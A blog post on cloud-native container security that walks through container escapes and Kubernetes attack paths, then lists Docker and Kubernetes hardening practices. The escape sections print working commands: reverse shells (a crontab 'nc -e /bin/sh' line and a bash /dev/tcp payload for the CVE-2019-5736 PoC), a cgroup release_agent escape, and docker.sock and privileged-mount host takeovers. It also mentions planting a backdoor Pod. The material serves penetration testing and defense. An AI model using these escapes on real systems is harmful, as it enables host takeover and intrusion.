ljluestc's Blog

Jan 23 2023

Table of Contents

Cloud Native Security
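Information gathering inside the container
1. Determining whether the current machine is a Docker container environment
Container escape
K8s security issues
Container security best practices
References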

Cloud Native Security

What is Cloud Native Security

Cloud native is a set of technologies and methodologies. The term combines two words: "cloud" means the application runs in the cloud rather than in a traditional data center, and "native" means the application is designed for the cloud from the start, so that it runs well there and takes full advantage of the elasticity and distributed nature of the cloud platform.

Representative cloud-native technologies include containers, service mesh, microservices, immutable infrastructure, and declarative APIs.

The 4 Cs of Cloud Native Security

You can think about security in layers. The 4 Cs of Cloud Native Security are Cloud, Cluster, Container, and Code.

Each layer of the cloud-native security model builds on the next outermost layer, and the code layer benefits from a strong underlying security layer (cloud, cluster, container). You cannot protect against poor security standards in the base layer by addressing security at the code layer.

Security from different perspectives

Build-Deploy-Run

Build-time security (Build)
- Audit container images with a rule engine
  - Dockerfile
  - Suspicious files
  - Sensitive permissions
  - Sensitive ports
  - Basic software vulnerabilities
  - Business software
Deployment-time security (Deployment)
- Kubernetes
Runtime security (Runtime)
- HIDS

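Before, during, and after an attack

Before the attack: trim the attack surface and reduce what is exposed externally (keyword for the scenarios in this article: isolation).
During the attack: lower the attack's success rate (keyword for the scenarios in this article: hardening).
After the attack: reduce the valuable information and data an attacker can obtain after a successful attack, and make it harder to leave a backdoor.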

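Container attack surface

Linux kernel vulnerabilities
- Kernel privilege escalation
- Container escape
The container runtime itself
- CVE-2019-5736: runc container breakout vulnerability
Insecure deployment (configuration)
- Privileged containers, or containers running as root;
- Unreasonable capability configuration (overly broad capabilities).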

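Information gathering inside the container

Determining whether the current machine is a Docker container environment

Check the name of the PID 1 process

If PID 1 is the application process itself, the environment is a container. If it is an init or systemd process, the environment is not necessarily a container, but a container cannot be ruled out either: in an LXD instance, for example, PID 1 is /sbin/init.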

ps -p1

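Check for kernel files

Unlike a virtual machine, a container shares the kernel with its host, so in theory there are no kernel files inside a container unless the host's /boot directory has been mounted.

KERNEL_PATH=$(cat /proc/cmdline | tr ' ' '\n' | awk -F '=' '/BOOT_IMAGE/{print $2}')
test -e $KERNEL_PATH && echo "Not Sure" || echo "Container"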

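Check whether /proc/1/cgroup contains the string docker; the same command also reveals the Docker container's UUID.

Containers use cgroups to enforce resource limits, and every container is placed in its own cgroup. For Docker, the cgroup is named docker-xxxx, where xxxx is the Docker container's UUID. Controlling a container's resources really means controlling the resources of the processes running inside it, so the cgroup name of PID 1 inside the container gives us a clue.

cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

Check whether a .dockerenv file exists in the root directory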

ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"

Other methods

sudo readlink /proc/1/exe
# If the result contains "system" (for example a systemd path), this is the host

systemd-detect-virt -c
# If this returns none, this is the host

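Container escape

User layer
- User misconfiguration
- Dangerous mounts
Service layer: flaws in the container service itself (program vulnerabilities)
System layer: Linux kernel vulnerabilities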

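Docker escape caused by misconfiguration

Unauthorized access to the Docker Remote API

docker swarm

docker swarm is a tool that turns a cluster of Docker hosts into a single virtual Docker host. It uses the standard Docker API, makes Docker clusters easier to manage and scale, and is provided officially by Docker.

docker swarm is a tool for managing Docker clusters. It uses a master/worker model and communicates over port 2375 by default. It binds a Docker Remote API service, which can be called over HTTP or from Python to operate Docker.

Setting up the vulnerable environment

Use vulhub to set up the vulnerable environment: Docker daemon API unauthorized access vulnerability

Exploit 1: RCE in a container

List all containers on the host:

curl -i -s -X GET http://<docker_host>:PORT/containers/json

Create an "exec" instance that will run inside the container: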

POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
  "AttachStdin": true,
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["cat", "/etc/passwd"],
  "DetachKeys": "ctrl-p,ctrl-q",
  "Privileged": true,
  "Tty": true
}

As a bash command:

curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec

Start the exec instance:

POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
 "Detach": false,
 "Tty": false
}

As a bash command:

curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start

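Exploit 2: RCE on the host

The approach is to start an arbitrary container with the host's /etc directory mounted into it, which allows arbitrary file reads and writes. A command can then be written into the crontab configuration file to get a reverse shell.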

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

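Exploiting with cdk

Run the command directly with cdk:

./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

This mounts the host's root directory / at /host inside the container and then runs the user-supplied command to tamper with files on the host; for example, writing to /etc/crontab is enough to take over the host.

Reference: Exploit: docker api pwn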
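From the defender's side, it is worth checking whether one of your own hosts answers the Remote API without authentication. The sketch below sends a plain GET /version, which the Docker Engine API answers with a JSON object that includes an ApiVersion field. The function names and the 3-second timeout are illustrative assumptions, and the check should only be pointed at hosts you are responsible for.

```python
import json
import urllib.error
import urllib.request


def looks_like_docker_version(body: bytes) -> bool:
    """True if the body is a JSON object shaped like a /version reply."""
    try:
        data = json.loads(body)
    except ValueError:  # not JSON, or not decodable text
        return False
    return isinstance(data, dict) and "ApiVersion" in data


def api_is_exposed(base_url: str, timeout: float = 3.0) -> bool:
    """Send an unauthenticated GET /version and report whether Docker answered."""
    try:
        with urllib.request.urlopen(f"{base_url}/version", timeout=timeout) as resp:
            return looks_like_docker_version(resp.read())
    except (urllib.error.URLError, OSError):
        return False  # refused, timed out, TLS required, HTTP error, ...
```

For example, `api_is_exposed("http://127.0.0.1:2375")` returning True means anything that can reach that port can drive the daemon, so the port should be closed or protected with TLS client certificates.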

Dangerous Docker startup option --privileged: starting a container in privileged mode

Cause

When the operator executes docker run --privileged, Docker allows the container to access all devices on the host and also adjusts the AppArmor or SELinux configuration so that the container has almost the same access rights as processes running directly on the host.

Environment setup

sudo docker run -itd --privileged ubuntu:latest /bin/bash

Exploitation

List the disks: fdisk -l
Create a directory to use as a mount point: mkdir /aa
Mount the host's /dev/sda1 at /aa inside the container: mount /dev/sda1 /aa
Files can now be written to gain access or read data.

Using cdk:

./cdk run mount-disk
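One hedged way to tell from inside a container whether it was started with elevated privileges is to read the CapEff bitmask from /proc/self/status and test individual capability bits. The sketch below assumes the usual Linux numbering, in which CAP_SYS_ADMIN is bit 21; the helper names are hypothetical, and the masks mentioned in the usage note are values commonly seen in practice, not guaranteed constants.

```python
CAP_SYS_ADMIN = 21  # bit number from linux/capability.h


def effective_caps(status_text: str) -> int:
    """Extract the CapEff bitmask from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_capability(mask: int, cap: int) -> bool:
    """Test a single capability bit in the mask."""
    return bool((mask >> cap) & 1)
```

Inside a container you would pass the contents of /proc/self/status. A default Docker container commonly shows a CapEff of 00000000a80425fb, which does not include CAP_SYS_ADMIN, whereas a privileged container shows a mask with nearly every bit set.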

Exploiting the dangerous Docker startup option --cap-add=SYS_ADMIN

Docker uses Linux namespaces to isolate six kinds of resources: host name, user permissions, file system, network, process IDs, and inter-process communication. However, some startup options grant the container greater permissions and thereby break these isolation boundaries.

--cap-add=SYS_ADMIN  allows privileged operations such as mount; exploitation requires mounting a resource.
--net=host           bypasses the Network namespace
--pid=host           bypasses the PID namespace
--ipc=host           bypasses the IPC namespace
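The options listed above leave traces in the HostConfig section of docker inspect output, so an existing container can be audited after the fact. This is a minimal sketch: `risky_settings` is a hypothetical helper, and it assumes the HostConfig keys Privileged, CapAdd, NetworkMode, PidMode, and IpcMode as they appear in docker inspect JSON.

```python
def risky_settings(host_config: dict) -> list:
    """Return findings for a HostConfig dict taken from `docker inspect`."""
    findings = []
    if host_config.get("Privileged"):
        findings.append("--privileged")
    # CapAdd may be null in the JSON; names may or may not carry a CAP_ prefix.
    caps = {c.upper().replace("CAP_", "") for c in host_config.get("CapAdd") or []}
    if "SYS_ADMIN" in caps:
        findings.append("--cap-add=SYS_ADMIN")
    for key, flag in (("NetworkMode", "--net=host"),
                      ("PidMode", "--pid=host"),
                      ("IpcMode", "--ipc=host")):
        if host_config.get(key) == "host":
            findings.append(flag)
    return findings
```

A typical use is to load the output of `docker inspect <container>` with `json.loads`, take the `HostConfig` of the first element, and pass it to the function; an empty list means none of these particular options were used, not that the container is safe.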

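Prerequisites:

The user inside the container is root
The container must run with the SYS_ADMIN Linux capability
The container must lack an AppArmor profile, or otherwise allow the mount syscall
The cgroup v1 virtual filesystem must be mounted read-write inside the container

We need a cgroup in which we can write the notify_on_release file (to enable cgroup notifications). The steps are: mount a cgroup controller and create a child cgroup, create a /bin/sh process and write its PID to the cgroup.procs file, and when sh exits the release_agent file is executed.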

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

View the exported file

ls /tmp/cgrp
cat /output

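Docker escape caused by dangerous mounts

Mounting a directory (-v /:/soft)

docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

Mounting the Docker socket

Reproducing the escape

First create a container with /var/run/docker.sock mounted:

docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

Install the Docker command-line client inside that container: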

apt-get update
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
apt-get install docker-ce docker-ce-cli containerd.io

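Next, use this client to talk to the Docker daemon through the Docker socket, and send a command to create and run a new container with the host's root directory mounted inside it:

docker run -it -v /:/host ubuntu:18.04 /bin/bash

Inside the new container, run chroot to switch the root directory to the mounted host root:

chroot /host

Run the command with the cdk tool:

./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"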

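Mounting the procfs directory

About procfs

procfs is a pseudo-filesystem that dynamically reflects the state of processes and other components in the system, and it contains many highly sensitive files. Mounting the host's procfs into an untrusted container is therefore very dangerous, especially when the container runs as root by default and User Namespace is not enabled.

The exploitation process is fairly complex, but cdk makes it quick. Example:

On the host, start a test container with the host's procfs mounted, then try to escape from it: docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
Inside the container, run: ./cdk run mount-procfs /mnt/host_proc "touch /tmp/exp-success"
The file /tmp/exp-success appears on the host, which shows that the exploit ran successfully and that the attacker can execute arbitrary commands on the host.

Reference: Exploit: mount procfs

Mounting the cgroup directory

Exploiting with cdk

./cdk run mount-cgroup "<shell-cmd>"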

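Docker escape caused by program vulnerabilities

CVE-2019-5736 runc container escape vulnerability

Vulnerability details

Docker, containerd, and other runc-based container runtimes contain a vulnerability: through a crafted container image or an exec operation, an attacker can obtain the file handle of the host's runc binary while it executes and overwrite that binary, gaining root execution on the host.

Affected versions

Docker version < 18.09.2
runc version <= 1.0-rc6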
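As a rough triage aid, the Docker version bound quoted above can be turned into a simple comparison. This is only a sketch with hypothetical helper names: it compares the numeric part of a version string such as the one reported by docker version, and it cannot see vendor backports, so a distribution package below the bound may already be patched.

```python
import re


def parse_version(text: str) -> tuple:
    """Turn '18.09.1' or '18.09.2-ce' into a tuple of ints, ignoring any suffix."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def docker_in_affected_range(version: str) -> bool:
    """True if the Docker version is below 18.09.2, the bound quoted above."""
    return parse_version(version) < (18, 9, 2)
```

The runc bound (<= 1.0-rc6) is not covered here because release-candidate strings need their own ordering rules.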

Exploitation steps

Using the PoC:

PoC: CVE-2019-5736-PoC

Modify the payload

vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

Compile

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go


Copy the binary into the Docker container and run it
Wait for the victim to attach to the container using docker exec
Receive the reverse shell

CVE-2019-14271 Docker cp command container escape attack vulnerability

Vulnerability details

When docker cp is run on the host, it calls a helper process, docker-tar, which is not containerized and dynamically loads some libnss libraries at runtime. By replacing those libnss libraries inside the container, an attacker can inject code into docker-tar. When a Docker user then tries to copy a file from the container, the malicious code executes, escaping the container and gaining root privileges on the host.

Affected versions

Docker 19.03.0

Vulnerability Reference

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

Vulnerability Reference

CVE-2019-13139 - Docker build code execution

Docker escape via kernel vulnerabilities

Dirty COW (CVE-2016-5195): Docker escape through the Dirty COW vulnerability

Vulnerability Description

Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel through which a Docker container can be escaped and a shell with root privileges obtained.

Docker shares the kernel with the host, so the exploit only works when the host kernel is itself vulnerable to Dirty COW.

Vulnerability reproduction

Environment: git clone https://github.com/gebl/dirtycow-docker-vdso.git

Using the CDK tool

CDK : https://github.com/cdk-team/CDK

Copy to container

# host
docker cp /Users/ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# container
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

Common commands

# Information gathering
cdk evaluate

# List all exploits
cdk run --list

# Run the specified exploit
cdk run <script-name> [options]

K8s security issues

The checks performed by cdk evaluate give a good overview of K8s security issues.

Pitfalls when setting up K8s

First install K8s through Docker Desktop; see: https://github.com/maguowei/k8s-docker-desktop-for-mac

Install the Kubernetes Dashboard: kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml

Start a local proxy: kubectl proxy

Visit http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/

The token is obtained in the steps below.

Install helm

brew install helm
helm repo add stable http://mirror.azure.cn/kubernetes/charts/
helm repo update
helm install my-mysql stable/mysql

Create a user:

1	kubectl apply -f dashboard-adminuser.yaml

The content of dashboard-adminuser.yaml is as follows:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kube-system

Get token

kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk '{print $1}')

kube-proxy boundary bypass (CVE-2020-8558)

An attacker in a container on the node, or on an adjacent host in the same LAN (the same Layer 2 domain), may be able to reach TCP/UDP services that are bound to and listening on the node's local address 127.0.0.1.

For details, see: CVE-2020-8558: Kubernetes localhost boundary bypass vulnerability notice

List services that may be affected:

lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN
lsof +c 15 -P -n -i4UDP@127.0.0.1
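Where lsof is not installed on a node, a similar TCP listing can be derived from /proc/net/tcp. The sketch below is an approximation with a hypothetical function name: it assumes a little-endian host (so 127.0.0.1 appears as 0100007F), relies on state code 0A meaning LISTEN, and covers IPv4 TCP only.

```python
import socket
import struct

TCP_LISTEN = "0A"  # state code for LISTEN in /proc/net/tcp


def loopback_listeners(proc_net_tcp: str) -> list:
    """Return the sorted TCP ports in LISTEN state bound to 127.0.0.1."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != TCP_LISTEN:
            continue
        addr_hex, port_hex = fields[1].split(":")
        # The IPv4 address is printed as a little-endian hex word.
        addr = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
        if addr == "127.0.0.1":
            ports.add(int(port_hex, 16))
    return sorted(ports)
```

On a node, pass in the contents of /proc/net/tcp; every port returned is a service that was meant to be reachable only locally and deserves a look on clusters affected by this CVE.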

K8s api-server

Check the environment variables to determine whether the current container belongs to a K8s Pod, obtain the address of the K8s api-server, and try to log in anonymously. If that succeeds, the K8s cluster can be taken over directly through the api-server.

Reference: https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

This requires the cluster to allow anonymous login, which K8s does not support by default. If the problem exists, you can use cdk kcurl anonymous to send HTTP requests.

K8s Service Account

In a Pod created by a K8s cluster, the Service Account credential (/run/secrets/kubernetes.io/serviceaccount/token) is mounted inside the container by default. CDK uses this credential to authenticate to the K8s api-server and tries to access high-privilege endpoints. If that succeeds, the account has high privileges and the Service Account can be used directly to manage the K8s cluster.
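When auditing a Pod, it helps to know which identity the mounted credential belongs to before reasoning about its permissions. Service account tokens are JWTs, so the claims can be read without contacting the api-server. The sketch below decodes the payload without verifying the signature; `token_claims` is a hypothetical helper, and TOKEN_PATH simply repeats the path given above.

```python
import base64
import json

TOKEN_PATH = "/run/secrets/kubernetes.io/serviceaccount/token"


def token_claims(token: str) -> dict:
    """Decode the JWT payload (second dot-separated part) without verification."""
    payload = token.strip().split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

Inside a Pod you would call `token_claims(open(TOKEN_PATH).read())`; the `sub` claim names the service account. Setting automountServiceAccountToken to false on Pods that do not need API access removes the credential altogether.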

To test this, first use cdk evaluate to determine whether the problem exists, then get the address of the K8s api-server, and then send a custom HTTP request to the api-server via cdk kcurl.

After that, CDK can be used to deploy a backdoor Pod and a shadow K8s api-server.

Container Security Best Practices
This part is translated from the Internet and will be sorted out later.

Container

Always use the latest version of Docker

Only allow trusted users to control the Docker daemon

Ensure audit rules are in place for the following:

- Docker daemon
- /var/lib/docker
- /etc/docker
- docker.service
- docker.socket
- /etc/default/docker
- /etc/docker/daemon.json
- /etc/sysconfig/docker
- /usr/bin/containerd
- /usr/sbin/runc

Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories

Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.

If you are using containers that do not have an explicit container user defined in the image, you should enable user namespace support, which will allow you to remap container users to host users.

Prevent the container from acquiring new privileges. By default, containers are allowed to acquire new privileges, so this restriction must be set explicitly. Another step you can take to minimize privilege escalation attacks is to remove setuid and setgid permissions from the image.

Run the container as a non-root user (UID not 0). By default, containers run as the root user inside the container.

When building containers, use only trusted base images.

Use a minimal base image that does not contain unnecessary packages that could lead to a larger attack surface.

Implement strong governance policies to enforce frequent image scanning.

Build a workflow that periodically identifies and removes stale or unused images and containers from the host.

Do not store secrets in the image/Dockerfile. By default, you are allowed to store secrets in a Dockerfile, but storing a secret in an image will make the secret accessible to any user of that image.

When running a container, remove any capabilities that are not required for the container to function as desired.

Do not run containers with the --privileged flag, as this gives the container most of the capabilities available to the underlying host. The flag also overrides any rules you have set with --cap-drop or --cap-add. In addition, run containers with --security-opt=no-new-privileges to prevent privilege escalation through setuid or setgid binaries.

Do not mount sensitive host system directories on containers, especially in writable mode, as this may expose them to malicious changes that could compromise the host.

Do not run sshd inside the container. By default, the ssh daemon does not run in a container, and you should not install it; this keeps security management of the SSH server simple.

Do not map any ports below 1024 inside the container: these are considered privileged ports because they typically carry sensitive data. By default, Docker maps container ports to host ports in the range 49153-65535, but it also allows mapping to privileged ports. As a general rule of thumb, open only the ports you need on your containers.

Do not share the host's network namespace, process namespace, IPC namespace, user namespace, or UTS namespace unless necessary to ensure proper isolation between Docker containers and the underlying host.

Specify the amount of memory and CPU the container needs to run as designed, rather than relying on arbitrary amounts. By default, Docker containers share their resources equally without restriction.

Set the container's root filesystem to read-only. Once running, the container does not need to change the root filesystem. Any changes made to the root filesystem may be for malicious purposes. In order to preserve container immutability - not patching a new container but recreating it from a new image - you should not make the root filesystem writable.

Impose PID limits. One of the advantages of containers is strict process identifier (PID) control. Every process in the kernel has a unique PID, and containers use Linux PID namespaces to give each container its own view of the PID hierarchy. Setting a PID limit caps the number of processes that can run in each container, which stops runaway process creation and can hinder lateral movement. PID limits also protect against fork bombs (processes that keep replicating themselves) and other abnormal processes. If your service always runs a fixed number of processes, setting the PID limit to exactly that number can mitigate many malicious behaviors, including reverse shells and remote code injection.

Do not configure your mount propagation rules to share. Shared mount propagation means that any changes made to a mount will be propagated to all instances of that mount. Instead, set mount propagation to slave or private mode so that necessary changes to the volume are not shared with (or propagated to) containers that do not require the change.

Do not use the docker exec command with the --privileged or --user=root options, as these grant extended Linux capabilities to the command running in the container.

Do not use the default bridge docker0. The default bridge leaves containers open to ARP spoofing and MAC flooding attacks. Instead, attach containers to a user-defined network.

Do not mount the Docker socket inside the container, as this approach will allow the process inside the container to execute commands, giving it complete control over the host machine.

Rule 5 - Disallow inter-container communication (--icc=false)

Use Linux security modules (seccomp, AppArmor or SELinux)

Rule 7 - Limit resources (memory, CPU, file descriptors, processes, restarts)

Rule 8 - Make filesystems and volumes read-only

Rule 10 - Set logging level to at least INFO
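Several of the recommendations above map directly onto docker run flags. The sketch below assembles such a command line; the function name and the default values (UID 1000, 256 MB, half a CPU, 100 PIDs) are illustrative assumptions and not recommendations for any particular workload.

```python
def hardened_run_args(image: str, user: str = "1000:1000", memory: str = "256m",
                      cpus: str = "0.5", pids_limit: int = 100) -> list:
    """Build a `docker run` argument list that applies the practices above."""
    return [
        "docker", "run", "--rm",
        "--user", user,                      # run as a non-root user
        "--read-only",                       # read-only root filesystem
        "--cap-drop=ALL",                    # drop every capability
        "--security-opt=no-new-privileges",  # block setuid/setgid escalation
        "--pids-limit", str(pids_limit),     # cap the number of processes
        "--memory", memory,                  # explicit memory limit
        "--cpus", cpus,                      # explicit CPU limit
        image,
    ]
```

The list can be passed to `subprocess.run`. Capabilities that a workload really needs can be added back one at a time with --cap-add, which keeps the final set explicit and reviewable.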

Kubernetes Security Best Practices

For RBAC, specify your Roles and ClusterRoles for specific users or user groups instead of granting cluster-admin privileges to any user or user group.

Avoid duplicating permissions when using Kubernetes RBAC, as doing so may cause operational issues.

Delete unused or inactive RBAC roles to focus on active roles when troubleshooting failures or investigating security incidents.

Use Kubernetes network policies to isolate your pods and explicitly allow only the communication paths your application needs to function. Otherwise, you are exposed to both lateral (east-west) and north-south threats.

If your pod requires internet access (ingress or egress), create an appropriate network policy that enforces the right network segmentation and firewall rules, give that policy a label selector, and then apply the matching label to your pod.

The PodSecurityPolicy admission controller can ensure that proper policies are enforced. It can prevent containers from running as root, or require that a container's root filesystem be mounted read-only (these suggestions should sound familiar, since they were all in the Docker list above). Note that PodSecurityPolicy was removed in Kubernetes 1.25 in favor of Pod Security Admission.

Use a Kubernetes admission controller to enforce image registry management policies so that all images fetched from untrusted registries are automatically rejected.
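The network policy advice above usually starts from a default-deny policy per namespace, with explicit allow rules layered on top. The sketch below builds such a manifest as a Python dict; the policy name default-deny-all and the function name are illustrative assumptions, while the apiVersion, kind, and spec fields follow the networking.k8s.io/v1 NetworkPolicy schema.

```python
import json


def default_deny_policy(namespace: str) -> dict:
    """Build a NetworkPolicy that selects every pod and allows no traffic."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "default-deny-all", "namespace": namespace},
        "spec": {
            "podSelector": {},                     # empty selector: all pods
            "policyTypes": ["Ingress", "Egress"],  # no rules listed: deny both
        },
    }


def to_json(manifest: dict) -> str:
    """Serialize the manifest; kubectl apply -f accepts JSON as well as YAML."""
    return json.dumps(manifest, indent=2)
```

Writing `to_json(default_deny_policy("demo"))` to a file and applying it only has an effect when the cluster's network plugin enforces NetworkPolicy.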

Questions you should be able to answer about your environment:

How many images are there on a host whose last scan date is more than 60 days old?

How many images/containers have high-severity vulnerabilities?

Which deployments are affected by these high-severity vulnerable containers?

Are there any containers in the affected deployment that store secrets?

Are any vulnerable containers running as root or with the privileged flag?

Are there any vulnerable containers in the pod that don't have a network policy (meaning it allows all communication) associated with it?

Are any containers running in production affected by this vulnerability?

Where did the images we are using come from?

How do we block images pulled from untrusted registries?

Can we see what processes are being executed while the container is running?

Which clusters, namespaces and nodes do not meet the CIS benchmark for Docker and Kubernetes?

Dockerfile issues that need attention

Make sure USER is specified

Make sure the base image version is fixed

Make sure the OS package version is pinned

Avoid using ADD, try to use COPY

Avoid using `apt/apk upgrade`

Avoid calling curl to get the bash file in the RUN command
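Most of the checks in this list can be approximated with a few lines of pattern matching. The following is a rough sketch and no substitute for a real linter: `lint_dockerfile` is a hypothetical helper, it looks at one line at a time (no line continuations), it treats any image reference containing a colon as pinned, and it does not check OS package version pinning.

```python
import re

UPGRADE_RE = re.compile(r"\b(apt-get|apt|apk)\s+(-\S+\s+)*(dist-)?upgrade\b")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")


def lint_dockerfile(text: str) -> list:
    """Return findings for the Dockerfile issues listed above."""
    lines = [ln.strip() for ln in text.splitlines()]
    instructions = [ln for ln in lines if ln and not ln.startswith("#")]
    findings = []
    if not any(ln.upper().startswith("USER ") for ln in instructions):
        findings.append("no USER instruction")
    for ln in instructions:
        upper = ln.upper()
        if upper.startswith("FROM "):
            # Skip flags such as --platform=... to find the image reference.
            parts = [p for p in ln.split()[1:] if not p.startswith("--")]
            image = parts[0] if parts else ""
            if ":" not in image or image.endswith(":latest"):
                findings.append(f"base image not pinned: {image}")
        elif upper.startswith("ADD "):
            findings.append("ADD used; prefer COPY")
        elif upper.startswith("RUN "):
            if UPGRADE_RE.search(ln):
                findings.append("package upgrade in RUN")
            if PIPE_TO_SHELL_RE.search(ln):
                findings.append("remote script piped to a shell")
    return findings
```

Running it over a Dockerfile's text returns one message per finding, in file order after the USER check; an empty list means none of these patterns matched.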

Static analysis tools

https://github.com/coreos/clair

https://github.com/aquasecurity/trivy

https://snyk.io/

https://anchore.com/opensource/

https://github.com/aquasecurity/microscanner

https://jfrog.com/xray/

https://www.qualys.com/apps/container-security/

https://www.inspec.io/docs/reference/resources/docker/

https://dev-sec.io/baselines/docker/

K8s config scanning tools

https://github.com/Shopify/kubeaudit

https://kubesec.io/

https://github.com/aquasecurity/kube-bench

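References

Meituan Technical Team: Container Security Practice in Cloud Native

Overview of Cloud Native Security - Kubernetes

Container Security: Going Beyond Image Scanning

Docker Container Security 101: Risks and 33 Best Practices

Docker Security Cheat Sheet

Docker Container Security: Challenges and Best Practices (https://resources.whitesourcesoftware.com/blog-whitesource/docker-container-security)

Summary of Docker Escapes, First Edition (Updated)

Penetration Testing: Docker Escape

CDK Home CN

[Cloud Native Attack and Defense Research] Overview of Container Escape Techniques

Overview of Container Escape Techniques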